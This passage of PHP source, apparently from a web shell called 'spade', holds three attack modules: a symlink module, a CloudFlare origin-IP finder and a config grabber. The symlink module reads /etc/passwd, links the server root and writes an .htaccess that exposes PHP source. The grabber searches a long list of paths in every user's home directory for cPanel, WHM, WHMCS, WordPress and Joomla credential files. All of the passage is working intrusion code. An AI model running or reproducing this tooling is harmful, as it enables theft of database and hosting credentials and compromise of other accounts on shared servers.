- echo "
- <table align=center border=1><tr>
- <td align=center><font size=3>S. No.</font></td>
- <td align=center><font size=3>Users</font></td>
- <td align=center><font size=3>Symlink</font></td></tr>";
- $dcount = 1;
- $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
- while(!feof($file)){
- $s = fgets($file);
- $matches = array();
- $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
- $matches = str_replace("home/","",$matches[1]);
- if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
- continue;
- echo "<tr><td align=center><font size=2>" . $dcount . "</td>
- <td align=center><font class=txt>" . $matches . "</td>";
- echo "<td align=center><font class=txt><a href=$full/spade_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
- $dcount++;}fclose($file);
- echo "</table>";}else{if($os != "Windows"){@mkdir("spade_sym",0777);@chdir("spade_sym");@exe("ln -s / root");$file3 = 'Options Indexes FollowSymLinks
- DirectoryIndex spade.htm
- AddType text/plain .php
- AddHandler text/plain .php
- Satisfy Any
- ';
- $fp3 = fopen('.htaccess','w');
- $fw3 = fwrite($fp3,$file3);@fclose($fp3);
- echo "
- <div class='mybox'>
- <table align=center border=1><tr>
- <td align=center><font size=3>ID</font></td>
- <td align=center><font size=3>Users</font></td>
- <td align=center><font size=3>Symlink</font></td></tr>";
- $temp = "";$val1 = 0;$val2 = 1000;
- for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
- if ($uid)$temp .= join(':',$uid)."\n";}
- echo '<br/>';$temp = trim($temp);$file5 =
- fopen("test.txt","w");
- fputs($file5,$temp);
- fclose($file5);$dcount = 1;$file =
- fopen("test.txt", "r") or exit("Unable to open file!");
- while(!feof($file)){$s = fgets($file);$matches = array();
- $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
- if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
- continue;
- echo "<tr><td align=center><font size=2>" . $dcount . "</td>
- <td align=center><font class=txt>" . $matches . "</td>";
- echo "<td align=center><font class=txt><a href=$full/spade_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
- $dcount++;}
- fclose($file);
- echo "</table></div></center>";unlink("test.txt");
- } else
- echo "<center><font size=3>Cannot create Symlink</font></center>";
- }
- } echo "</center>";
- }elseif($_GET['do'] == 'cloudflare'){
- echo "<center><h1 class=titulo>CloudFlare Bypass</h1><br><form method=post>Target Url:: <input type=text name='cloudflare' placeholder='target.com'><input type=submit value='Bypass'></form><br>";
- if(isset($_POST['cloudflare'])){
- function is_ipv4($ip){ return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)'; }
- $url = $_POST['cloudflare'];
- if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
- $url = preg_replace('/^(https?):\/\//', '', $url);
- $url = "http://www.".$url;
- }
- $headers = @get_headers($url, 1);
- $server = $headers['Server'];
- $subs = array('news.','download.','','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns1.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.');
- if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
- if($matches[2] != 'www'){
- $url = preg_replace('/^(https?):\/\//', '', $url);
- }else{
- $url = explode($matches[0], $url);
- $url = $url[1];
- }
- }
- if(is_array($server))$server = $server[0];
- if(preg_match('/cloudflare/i', $server)) echo "\n[+] CloudFlare detected: {$server}\n<br>";
- else echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
- echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
- echo "[+] Searching for more IP addresses.\n\n<br><br>";
- for($x=0;$x<count($subs);$x++){
- $site = $subs[$x] . $url;
- $ip = is_ipv4(gethostbyname($site));
- if($ip == '(Null)') continue;
- echo "Trying {$site}: {$ip}\n<br>";
- }
- echo "\n[+] Finished.\n<br>";
- }
- echo "</center>";
- }elseif($_GET['do'] == 'config') {
- echo "<center><h1 class='titulo'>SYM/CONFIG</h1></center><br>";
- if($_POST){
- $passwd = $_POST['passwd'];
- mkdir("spade_config", 0777);
- $isi_htc = "Options all\nRequire None\nSatisfy Any";
- $htc = fopen("spade_config/.htaccess","w");
- fwrite($htc, $isi_htc);
- preg_match_all('/(.*?):x:/', $passwd, $user_config);
- foreach($user_config[1] as $user_spade) {
- $user_config_dir = "/home/$user_spade/public_html/";
- if(is_readable($user_config_dir)) {
- $grab_config = array(
- "/home/$user_spade/.my.cnf" => "cpanel",
- "/home/$user_spade/.accesshash" => "WHM-accesshash",
- "/home/$user_spade/public_html/bw-configs/config.ini" => "BosWeb",
- "/home/$user_spade/public_html/config/koneksi.php" => "Lokomedia",
- "/home/$user_spade/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
- "/home/$user_spade/public_html/clientarea/configuration.php" => "WHMCS",
- "/home/$user_spade/public_html/whmcs/configuration.php" => "WHMCS",
- "/home/$user_spade/public_html/forum/config.php" => "phpBB",
- "/home/$user_spade/public_html/sites/default/settings.php" => "Drupal",
- "/home/$user_spade/public_html/config/settings.inc.php" => "PrestaShop",
- "/home/$user_spade/public_html/app/etc/local.xml" => "Magento",
- "/home/$user_spade/public_html/admin/config.php" => "OpenCart",
- "/home/$user_spade/public_html/slconfig.php" => "Sitelok",
- "/home/$user_spade/public_html/application/config/database.php" => "Ellislab",
- "/home/$user_spade/public_html/whm/configuration.php" => "WHMCS",
- "/home/$user_spade/public_html/whmc/WHM/configuration.ph" => "WHMC",
- "/home/$user_spade/public_html/central/configuration.php" => "WHM Central",
- "/home/$user_spade/public_html/whm/WHMCS/configuration.php" => "WHMCS",
- "/home/$user_spade/public_html/whm/whmcs/configuration.php" => "WHMCS",
- "/home/$user_spade/public_html/submitticket.php" => "WHMCS",
- "/home/$user_spade/public_html/configuration.php" => "Joomla",
- "/home/$user_spade/public_html/Joomla/configuration.php" => "JoomlaJoomla",
- "/home/$user_spade/public_html/joomla/configuration.php" => "JoomlaJoomla",
- "/home/$user_spade/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
- "/home/$user_spade/public_html/Home/configuration.php" => "JoomlaHome",
- "/home/$user_spade/public_html/HOME/configuration.php" => "JoomlaHome",
- "/home/$user_spade/public_html/home/configuration.php" => "JoomlaHome",
- "/home/$user_spade/public_html/NEW/configuration.php" => "JoomlaNew",
- "/home/$user_spade/public_html/New/configuration.php" => "JoomlaNew",
- "/home/$user_spade/public_html/new/configuration.php" => "JoomlaNew",
- "/home/$user_spade/public_html/News/configuration.php" => "JoomlaNews",
- "/home/$user_spade/public_html/NEWS/configuration.php" => "JoomlaNews",
- "/home/$user_spade/public_html/news/configuration.php" => "JoomlaNews",
- "/home/$user_spade/public_html/Cms/configuration.php" => "JoomlaCms",
- "/home/$user_spade/public_html/CMS/configuration.php" => "JoomlaCms",
- "/home/$user_spade/public_html/cms/configuration.php" => "JoomlaCms",
- "/home/$user_spade/public_html/Main/configuration.php" => "JoomlaMain",
- "/home/$user_spade/public_html/MAIN/configuration.php" => "JoomlaMain",
- "/home/$user_spade/public_html/main/configuration.php" => "JoomlaMain",
- "/home/$user_spade/public_html/Blog/configuration.php" => "JoomlaBlog",
- "/home/$user_spade/public_html/BLOG/configuration.php" => "JoomlaBlog",
- "/home/$user_spade/public_html/blog/configuration.php" => "JoomlaBlog",
- "/home/$user_spade/public_html/Blogs/configuration.php" => "JoomlaBlogs",
- "/home/$user_spade/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
- "/home/$user_spade/public_html/blogs/configuration.php" => "JoomlaBlogs",
- "/home/$user_spade/public_html/beta/configuration.php" => "JoomlaBeta",
- "/home/$user_spade/public_html/Beta/configuration.php" => "JoomlaBeta",
- "/home/$user_spade/public_html/BETA/configuration.php" => "JoomlaBeta",
- "/home/$user_spade/public_html/PRESS/configuration.php" => "JoomlaPress",
- "/home/$user_spade/public_html/Press/configuration.php" => "JoomlaPress",
- "/home/$user_spade/public_html/press/configuration.php" => "JoomlaPress",
- "/home/$user_spade/public_html/Wp/configuration.php" => "JoomlaWp",
- "/home/$user_spade/public_html/wp/configuration.php" => "JoomlaWp",
- "/home/$user_spade/public_html/WP/configuration.php" => "JoomlaWP",
- "/home/$user_spade/public_html/portal/configuration.php" => "JoomlaPortal",
- "/home/$user_spade/public_html/PORTAL/configuration.php" => "JoomlaPortal",
- "/home/$user_spade/public_html/Portal/configuration.php" => "JoomlaPortal",
- "/home/$user_spade/public_html/wp-config.php" => "WordPress",
- "/home/$user_spade/public_html/wordpress/wp-config.php" => "WordPressWordpress",
- "/home/$user_spade/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
- "/home/$user_spade/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
- "/home/$user_spade/public_html/Home/wp-config.php" => "WordPressHome",
- "/home/$user_spade/public_html/HOME/wp-config.php" => "WordPressHome",
- "/home/$user_spade/public_html/home/wp-config.php" => "WordPressHome",
- "/home/$user_spade/public_html/NEW/wp-config.php" => "WordPressNew",
- "/home/$user_spade/public_html/New/wp-config.php" => "WordPressNew",
- "/home/$user_spade/public_html/new/wp-config.php" => "WordPressNew",
- "/home/$user_spade/public_html/News/wp-config.php" => "WordPressNews",
- "/home/$user_spade/public_html/NEWS/wp-config.php" => "WordPressNews",
- "/home/$user_spade/public_html/news/wp-config.php" => "WordPressNews",
- "/home/$user_spade/public_html/Cms/wp-config.php" => "WordPressCms",
- "/home/$user_spade/public_html/CMS/wp-config.php" => "WordPressCms",
- "/home/$user_spade/public_html/cms/wp-config.php" => "WordPressCms",
- "/home/$user_spade/public_html/Main/wp-config.php" => "WordPressMain",
- "/home/$user_spade/public_html/MAIN/wp-config.php" => "WordPressMain",
- "/home/$user_spade/public_html/main/wp-config.php" => "WordPressMain",
- "/home/$user_spade/public_html/Blog/wp-config.php" => "WordPressBlog",
- "/home/$user_spade/public_html/BLOG/wp-config.php" => "WordPressBlog",
- "/home/$user_spade/public_html/blog/wp-config.php" => "WordPressBlog",
- "/home/$user_spade/public_html/Blogs/wp-config.php" => "WordPressBlogs",
- "/home/$user_spade/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
- "/home/$user_spade/public_html/blogs/wp-config.php" => "WordPressBlogs",
- "/home/$user_spade/public_html/beta/wp-config.php" => "WordPressBeta",
- "/home/$user_spade/public_html/Beta/wp-config.php" => "WordPressBeta",
- "/home/$user_spade/public_html/BETA/wp-config.php" => "WordPressBeta",
- "/home/$user_spade/public_html/PRESS/wp-config.php" => "WordPressPress",
- "/home/$user_spade/public_html/Press/wp-config.php" => "WordPressPress",
- "/home/$user_spade/public_html/press/wp-config.php" => "WordPressPress",
- "/home/$user_spade/public_html/Wp/wp-config.php" => "WordPressWp",
- "/home/$user_spade/public_html/wp/wp-config.php" => "WordPressWp",
- "/home/$user_spade/public_html/WP/wp-config.php" => "WordPressWP",
- "/home/$user_spade/public_html/portal/wp-config.php" => "WordPressPortal",
- "/home/$user_spade/public_html/PORTAL/wp-config.php" => "WordPressPortal",
- "/home/$user_spade/public_html/Portal/wp-config.php" => "WordPressPortal",
- "/home1/$user_spade/.my.cnf" => "cpanel",
- "/home1/$user_spade/.accesshash" => "WHM-accesshash",
- "/home1/$user_spade/public_html/bw-configs/config.ini" => "BosWeb",
- "/home1/$user_spade/public_html/config/koneksi.php" => "Lokomedia",
- "/home1/$user_spade/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
- "/home1/$user_spade/public_html/clientarea/configuration.php" => "WHMCS",
- "/home1/$user_spade/public_html/whmcs/configuration.php" => "WHMCS",
- "/home1/$user_spade/public_html/forum/config.php" => "phpBB",
- "/home1/$user_spade/public_html/sites/default/settings.php" => "Drupal",
- "/home1/$user_spade/public_html/config/settings.inc.php" => "PrestaShop",
- "/home1/$user_spade/public_html/app/etc/local.xml" => "Magento",
- "/home1/$user_spade/public_html/admin/config.php" => "OpenCart",
- "/home1/$user_spade/public_html/slconfig.php" => "Sitelok",
- "/home1/$user_spade/public_html/application/config/database.php" => "Ellislab",
- "/home1/$user_spade/public_html/whm/configuration.php" => "WHMCS",
- "/home1/$user_spade/public_html/whmc/WHM/configuration.ph" => "WHMC",
- "/home1/$user_spade/public_html/central/configuration.php" => "WHM Central",
- "/home1/$user_spade/public_html/whm/WHMCS/configuration.php" => "WHMCS",
- "/home1/$user_spade/public_html/whm/whmcs/configuration.php" => "WHMCS",
- "/home1/$user_spade/public_html/submitticket.php" => "WHMCS",
- "/home1/$user_spade/public_html/configuration.php" => "Joomla",
- "/home1/$user_spade/public_html/Joomla/configuration.php" => "JoomlaJoomla",
- "/home1/$user_spade/public_html/joomla/configuration.php" => "JoomlaJoomla",
- "/home1/$user_spade/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
- "/home1/$user_spade/public_html/Home/configuration.php" => "JoomlaHome",
- "/home1/$user_spade/public_html/HOME/configuration.php" => "JoomlaHome",
- "/home1/$user_spade/public_html/home/configuration.php" => "JoomlaHome",
- "/home1/$user_spade/public_html/NEW/configuration.php" => "JoomlaNew",
- "/home1/$user_spade/public_html/New/configuration.php" => "JoomlaNew",
- "/home1/$user_spade/public_html/new/configuration.php" => "JoomlaNew",
- "/home1/$user_spade/public_html/News/configuration.php" => "JoomlaNews",
- "/home1/$user_spade/public_html/NEWS/configuration.php" => "JoomlaNews",
- "/home1/$user_spade/public_html/news/configuration.php" => "JoomlaNews",
- "/home1/$user_spade/public_html/Cms/configuration.php" => "JoomlaCms",
- "/home1/$user_spade/public_html/CMS/configuration.php" => "JoomlaCms",
- "/home1/$user_spade/public_html/cms/configuration.php" => "JoomlaCms",
- "/home1/$user_spade/public_html/Main/configuration.php" => "JoomlaMain",
- "/home1/$user_spade/public_html/MAIN/configuration.php" => "JoomlaMain",
- "/home1/$user_spade/public_html/main/configuration.php" => "JoomlaMain",
- "/home1/$user_spade/public_html/Blog/configuration.php" => "JoomlaBlog",
- "/home1/$user_spade/public_html/BLOG/configuration.php" => "JoomlaBlog",
- "/home1/$user_spade/public_html/blog/configuration.php" => "JoomlaBlog",
- "/home1/$user_spade/public_html/Blogs/configuration.php" => "JoomlaBlogs",
- "/home1/$user_spade/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
- "/home1/$user_spade/public_html/blogs/configuration.php" => "JoomlaBlogs",
- "/home1/$user_spade/public_html/beta/configuration.php" => "JoomlaBeta",
- "/home1/$user_spade/public_html/Beta/configuration.php" => "JoomlaBeta",
- "/home1/$user_spade/public_html/BETA/configuration.php" => "JoomlaBeta",
- "/home1/$user_spade/public_html/PRESS/configuration.php" => "JoomlaPress",
- "/home1/$user_spade/public_html/Press/configuration.php" => "JoomlaPress",
- "/home1/$user_spade/public_html/press/configuration.php" => "JoomlaPress",
- "/home1/$user_spade/public_html/Wp/configuration.php" => "JoomlaWp",
- "/home1/$user_spade/public_html/wp/configuration.php" => "JoomlaWp",
- "/home1/$user_spade/public_html/WP/configuration.php" => "JoomlaWP",
- "/home1/$user_spade/public_html/portal/configuration.php" => "JoomlaPortal",
- "/home1/$user_spade/public_html/PORTAL/configuration.php" => "JoomlaPortal",
- "/home1/$user_spade/public_html/Portal/configuration.php" => "JoomlaPortal",
- "/home1/$user_spade/public_html/wp-config.php" => "WordPress",
- "/home1/$user_spade/public_html/wordpress/wp-config.php" => "WordPressWordpress",
- "/home1/$user_spade/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
- "/home1/$user_spade/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
- "/home1/$user_spade/public_html/Home/wp-config.php" => "WordPressHome",
- "/home1/$user_spade/public_html/HOME/wp-config.php" => "WordPressHome",
- "/home1/$user_spade/public_html/home/wp-config.php" => "WordPressHome",
- "/home1/$user_spade/public_html/NEW/wp-config.php" => "WordPressNew",
- "/home1/$user_spade/public_html/New/wp-config.php" => "WordPressNew",
- "/home1/$user_spade/public_html/new/wp-config.php" => "WordPressNew",
- "/home1/$user_spade/public_html/News/wp-config.php" => "WordPressNews",
- "/home1/$user_spade/public_html/NEWS/wp-config.php" => "WordPressNews",
- "/home1/$user_spade/public_html/news/wp-config.php" => "WordPressNews",
- "/home1/$user_spade/public_html/Cms/wp-config.php" => "WordPressCms",
- "/home1/$user_spade/public_html/CMS/wp-config.php" => "WordPressCms",
- "/home1/$user_spade/public_html/cms/wp-config.php" => "WordPressCms",
- "/home1/$user_spade/public_html/Main/wp-config.php" => "WordPressMain",
- "/home1/$user_spade/public_html/MAIN/wp-config.php" => "WordPressMain",
- "/home1/$user_spade/public_html/main/wp-config.php" => "WordPressMain",
- "/home1/$user_spade/public_html/Blog/wp-config.php" => "WordPressBlog",
- "/home1/$user_spade/public_html/BLOG/wp-config.php" => "WordPressBlog",
- "/home1/$user_spade/public_html/blog/wp-config.php" => "WordPressBlog",
- "/home1/$user_spade/public_html/Blogs/wp-config.php" => "WordPressBlogs",
- "/home1/$user_spade/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
- "/home1/$user_spade/public_html/blogs/wp-config.php" => "WordPressBlogs",
- "/home1/$user_spade/public_html/beta/wp-config.php" => "WordPressBeta",
- "/home1/$user_spade/public_html/Beta/wp-config.php" => "WordPressBeta",
- "/home1/$user_spade/public_html/BETA/wp-config.php" => "WordPressBeta",
- "/home1/$user_spade/public_html/PRESS/wp-config.php" => "WordPressPress",
- "/home1/$user_spade/public_html/Press/wp-config.php" => "WordPressPress",
- "/home1/$user_spade/public_html/press/wp-config.php" => "WordPressPress",
- "/home1/$user_spade/public_html/Wp/wp-config.php" => "WordPressWp",
- "/home1/$user_spade/public_html/wp/wp-config.php" => "WordPressWp",
- "/home1/$user_spade/public_html/WP/wp-config.php" => "WordPressWP",
- "/home1/$user_spade/public_html/portal/wp-config.php" => "WordPressPortal",
- "/home1/$user_spade/public_html/PORTAL/wp-config.php" => "WordPressPortal",
- "/home1/$user_spade/public_html/Portal/wp-config.php" => "WordPressPortal",
- "/home2/$user_spade/.my.cnf" => "cpanel",
- "/home2/$user_spade/.accesshash" => "WHM-accesshash",
- "/home2/$user_spade/public_html/bw-configs/config.ini" => "BosWeb",
- "/home2/$user_spade/public_html/config/koneksi.php" => "Lokomedia",
- "/home2/$user_spade/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
- "/home2/$user_spade/public_html/clientarea/configuration.php" => "WHMCS",
- "/home2/$user_spade/public_html/whmcs/configuration.php" => "WHMCS",
- "/home2/$user_spade/public_html/forum/config.php" => "phpBB",
- "/home2/$user_spade/public_html/sites/default/settings.php" => "Drupal",
- "/home2/$user_spade/public_html/config/settings.inc.php" => "PrestaShop",
- "/home2/$user_spade/public_html/app/etc/local.xml" => "Magento",
- "/home2/$user_spade/public_html/admin/config.php" => "OpenCart",
- "/home2/$user_spade/public_html/slconfig.php" => "Sitelok",
- "/home2/$user_spade/public_html/application/config/database.php" => "Ellislab",
- "/home2/$user_spade/public_html/whm/configuration.php" => "WHMCS",
- "/home2/$user_spade/public_html/whmc/WHM/configuration.ph" => "WHMC",
- "/home2/$user_spade/public_html/central/configuration.php" => "WHM Central",
- "/home2/$user_spade/public_html/whm/WHMCS/configuration.php" => "WHMCS",
- "/home2/$user_spade/public_html/whm/whmcs/configuration.php" => "WHMCS",
- "/home2/$user_spade/public_html/submitticket.php" => "WHMCS",
- "/home2/$user_spade/public_html/configuration.php" => "Joomla",
- "/home2/$user_spade/public_html/Joomla/configuration.php" => "JoomlaJoomla",
- "/home2/$user_spade/public_html/joomla/configuration.php" => "JoomlaJoomla",
- "/home2/$user_spade/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
- "/home2/$user_spade/public_html/Home/configuration.php" => "JoomlaHome",
- "/home2/$user_spade/public_html/HOME/configuration.php" => "JoomlaHome",
- "/home2/$user_spade/public_html/home/configuration.php" => "JoomlaHome",
- "/home2/$user_spade/public_html/NEW/configuration.php" => "JoomlaNew",
- "/home2/$user_spade/public_html/New/configuration.php" => "JoomlaNew",
- "/home2/$user_spade/public_html/new/configuration.php" => "JoomlaNew",
- "/home2/$user_spade/public_html/News/configuration.php" => "JoomlaNews",
- "/home2/$user_spade/public_html/NEWS/configuration.php" => "JoomlaNews",
- "/home2/$user_spade/public_html/news/configuration.php" => "JoomlaNews",
- "/home2/$user_spade/public_html/Cms/configuration.php" => "JoomlaCms",
- "/home2/$user_spade/public_html/CMS/configuration.php" => "JoomlaCms",
- "/home2/$user_spade/public_html/cms/configuration.php" => "JoomlaCms",
- "/home2/$user_spade/public_html/Main/configuration.php" => "JoomlaMain",
- "/home2/$user_spade/public_html/MAIN/configuration.php" => "JoomlaMain",
- "/home2/$user_spade/public_html/main/configuration.php" => "JoomlaMain",
- "/home2/$user_spade/public_html/Blog/configuration.php" => "JoomlaBlog",
- "/home2/$user_spade/public_html/BLOG/configuration.php" => "JoomlaBlog",
- "/home2/$user_spade/public_html/blog/configuration.php" => "JoomlaBlog",
- "/home2/$user_spade/public_html/Blogs/configuration.php" => "JoomlaBlogs",
- "/home2/$user_spade/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
- "/home2/$user_spade/public_html/blogs/configuration.php" => "JoomlaBlogs",
- "/home2/$user_spade/public_html/beta/configuration.php" => "JoomlaBeta",
- "/home2/$user_spade/public_html/Beta/configuration.php" => "JoomlaBeta",
- "/home2/$user_spade/public_html/BETA/configuration.php" => "JoomlaBeta",
- "/home2/$user_spade/public_html/PRESS/configuration.php" => "JoomlaPress",
- "/home2/$user_spade/public_html/Press/configuration.php" => "JoomlaPress",
- "/home2/$user_spade/public_html/press/configuration.php" => "JoomlaPress",
- "/home2/$user_spade/public_html/Wp/configuration.php" => "JoomlaWp",
- "/home2/$user_spade/public_html/wp/configuration.php" => "JoomlaWp",
- "/home2/$user_spade/public_html/WP/configuration.php" => "JoomlaWP",
- "/home2/$user_spade/public_html/portal/configuration.php" => "JoomlaPortal",
- "/home2/$user_spade/public_html/PORTAL/configuration.php" => "JoomlaPortal",
- "/home2/$user_spade/public_html/Portal/configuration.php" => "JoomlaPortal",
- "/home2/$user_spade/public_html/wp-config.php" => "WordPress",
- "/home2/$user_spade/public_html/wordpress/wp-config.php" => "WordPressWordpress",
- "/home2/$user_spade/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
- "/home2/$user_spade/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
- "/home2/$user_spade/public_html/Home/wp-config.php" => "WordPressHome",
- "/home2/$user_spade/public_html/HOME/wp-config.php" => "WordPressHome",
- "/home2/$user_spade/public_html/home/wp-config.php" => "WordPressHome",
- "/home2/$user_spade/public_html/NEW/wp-config.php" => "WordPressNew",
- "/home2/$user_spade/public_html/New/wp-config.php" => "WordPressNew",
- "/home2/$user_spade/public_html/new/wp-config.php" => "WordPressNew",
- "/home2/$user_spade/public_html/News/wp-config.php" => "WordPressNews",
- "/home2/$user_spade/public_html/NEWS/wp-config.php" => "WordPressNews",
- "/home2/$user_spade/public_html/news/wp-config.php" => "WordPressNews",
- "/home2/$user_spade/public_html/Cms/wp-config.php" => "WordPressCms",
- "/home2/$user_spade/public_html/CMS/wp-config.php" => "WordPressCms",
- "/home2/$user_spade/public_html/cms/wp-config.php" => "WordPressCms",
- "/home2/$user_spade/public_html/Main/wp-config.php" => "WordPressMain",
- "/home2/$user_spade/public_html/MAIN/wp-config.php" => "WordPressMain",
- "/home2/$user_spade/public_html/main/wp-config.php" => "WordPressMain",
- "/home2/$user_spade/public_html/Blog/wp-config.php" => "WordPressBlog",
- "/home2/$user_spade/public_html/BLOG/wp-config.php" => "WordPressBlog",
- "/home2/$user_spade/public_html/blog/wp-config.php" => "WordPressBlog",
- "/home2/$user_spade/public_html/Blogs/wp-config.php" => "WordPressBlogs",
- "/home2/$user_spade/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
- "/home2/$user_spade/public_html/blogs/wp-config.php" => "WordPressBlogs",
- "/home2/$user_spade/public_html/beta/wp-config.php" => "WordPressBeta",
- "/home2/$user_spade/public_html/Beta/wp-config.php" => "WordPressBeta",
- "/home2/$user_spade/public_html/BETA/wp-config.php" => "WordPressBeta",
- "/home2/$user_spade/public_html/PRESS/wp-config.php" => "WordPressPress",
- "/home2/$user_spade/public_html/Press/wp-config.php" => "WordPressPress",
- "/home2/$user_spade/public_html/press/wp-config.php" => "WordPressPress",
- "/home2/$user_spade/public_html/Wp/wp-config.php" => "WordPressWp",
- "/home2/$user_spade/public_html/wp/wp-config.php" => "WordPressWp",
- "/home2/$user_spade/public_html/WP/wp-config.php" => "WordPressWP",
- "/home2/$user_spade/public_html/portal/wp-config.php" => "WordPressPortal",
- "/home2/$user_spade/public_html/PORTAL/wp-config.php" => "WordPressPortal",
- "/home2/$user_spade/public_html/Portal/wp-config.php" => "WordPressPortal",
- "/home3/$user_spade/.my.cnf" => "cpanel",
- "/home3/$user_spade/.accesshash" => "WHM-accesshash",
- "/home3/$user_spade/public_html/bw-configs/config.ini" => "BosWeb",
- "/home3/$user_spade/public_html/config/koneksi.php" => "Lokomedia",
- "/home3/$user_spade/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
- "/home3/$user_spade/public_html/clientarea/configuration.php" => "WHMCS",
- "/home3/$user_spade/public_html/whmcs/configuration.php" => "WHMCS",
- "/home3/$user_spade/public_html/forum/config.php" => "phpBB",
- "/home3/$user_spade/public_html/sites/default/settings.php" => "Drupal",
- "/home3/$user_spade/public_html/config/settings.inc.php" => "PrestaShop",
- "/home3/$user_spade/public_html/app/etc/local.xml" => "Magento",
- "/home3/$user_spade/public_html/admin/config.php" => "OpenCart",
- "/home3/$user_spade/public_html/slconfig.php" => "Sitelok",
- "/home3/$user_spade/public_html/application/config/database.php" => "Ellislab",
- "/home3/$user_spade/public_html/whm/configuration.php" => "WHMCS",
- "/home3/$user_spade/public_html/whmc/WHM/configuration.ph" => "WHMC",
- "/home3/$user_spade/public_html/central/configuration.php" => "WHM Central",
- "/home3/$user_spade/public_html/whm/WHMCS/configuration.php" => "WHMCS",
- "/home3/$user_spade/public_html/whm/whmcs/configuration.php" => "WHMCS",
- "/home3/$user_spade/public_html/submitticket.php" => "WHMCS",
- "/home3/$user_spade/public_html/configuration.php" => "Joomla",
- "/home3/$user_spade/public_html/Joomla/configuration.php" => "JoomlaJoomla",
- "/home3/$user_spade/public_html/joomla/configuration.php" => "JoomlaJoomla",
- "/home3/$user_spade/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
- "/home3/$user_spade/public_html/Home/configuration.php" => "JoomlaHome",
- "/home3/$user_spade/public_html/HOME/configuration.php" => "JoomlaHome",
- "/home3/$user_spade/public_html/home/configuration.php" => "JoomlaHome",
- "/home3/$user_spade/public_html/NEW/configuration.php" => "JoomlaNew",
- "/home3/$user_spade/public_html/New/configuration.php" => "JoomlaNew",
- "/home3/$user_spade/public_html/new/configuration.php" => "JoomlaNew",
- "/home3/$user_spade/public_html/News/configuration.php" => "JoomlaNews",
- "/home3/$user_spade/public_html/NEWS/configuration.php" => "JoomlaNews",
- "/home3/$user_spade/public_html/news/configuration.php" => "JoomlaNews",
- "/home3/$user_spade/public_html/Cms/configuration.php" => "JoomlaCms",
- "/home3/$user_spade/public_html/CMS/configuration.php" => "JoomlaCms",
- "/home3/$user_spade/public_html/cms/configuration.php" => "JoomlaCms",
- "/home3/$user_spade/public_html/Main/configuration.php" => "JoomlaMain",
- "/home3/$user_spade/public_html/MAIN/configuration.php" => "JoomlaMain",
- "/home3/$user_spade/public_html/main/configuration.php" => "JoomlaMain",
- "/home3/$user_spade/public_html/Blog/configuration.php" => "JoomlaBlog",
- "/home3/$user_spade/public_html/BLOG/configuration.php" => "JoomlaBlog",
- "/home3/$user_spade/public_html/blog/configuration.php" => "JoomlaBlog",
- "/home3/$user_spade/public_html/Blogs/configuration.php" => "JoomlaBlogs",
- "/home3/$user_spade/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
- "/home3/$user_spade/public_html/blogs/configuration.php" => "JoomlaBlogs",
- "/home3/$user_spade/public_html/beta/configuration.php" => "JoomlaBeta",
- "/home3/$user_spade/public_html/Beta/configuration.php" => "JoomlaBeta",
- "/home3/$user_spade/public_html/BETA/configuration.php" => "JoomlaBeta",
- "/home3/$user_spade/public_html/PRESS/configuration.php" => "JoomlaPress",
- "/home3/$user_spade/public_html/Press/configuration.php" => "JoomlaPress",
- "/home3/$user_spade/public_html/press/configuration.php" => "JoomlaPress",
- "/home3/$user_spade/public_html/Wp/configuration.php" => "JoomlaWp",
- "/home3/$user_spade/public_html/wp/configuration.php" => "JoomlaWp",
- "/home3/$user_spade/public_html/WP/configuration.php" => "JoomlaWP",
- "/home3/$user_spade/public_html/portal/configuration.php" => "JoomlaPortal",
- "/home3/$user_spade/public_html/PORTAL/configuration.php" => "JoomlaPortal",
- "/home3/$user_spade/public_html/Portal/configuration.php" => "JoomlaPortal",
- "/home3/$user_spade/public_html/wp-config.php" => "WordPress",
- "/home3/$user_spade/public_html/wordpress/wp-config.php" => "WordPressWordpress",
- "/home3/$user_spade/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
